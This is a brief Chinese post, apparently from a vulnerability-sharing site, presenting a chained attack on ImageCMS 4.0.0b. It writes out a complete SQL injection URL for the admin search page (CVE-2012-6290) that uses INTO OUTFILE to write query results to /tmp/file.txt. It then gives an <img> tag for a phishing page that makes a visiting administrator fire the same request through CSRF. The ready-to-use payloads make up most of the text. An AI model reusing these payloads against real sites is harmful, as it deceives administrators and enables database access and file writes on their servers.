这是一个组合利用的漏洞
在ImageCMS4.0.0b 中存在 后台SQL注入漏洞:CVE-2012-6290
http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202
然后需要在网站上放置页面诱使网站管理员访问,提交钓鱼页面可以使用图片插入CSRF请求:
<img src="http://[host]/admin/admin_search?q=123%27%20UNION%20SELECT%201,2,version%28%29,4,5,6,7,8,9,10,11,1 2,13,14,15%20INTO%20OUTFILE%27/tmp/file.txt%27%20--%202">
当管理员访问时就会将查询内容写入/tmp/file.txt文件中。
暂无评论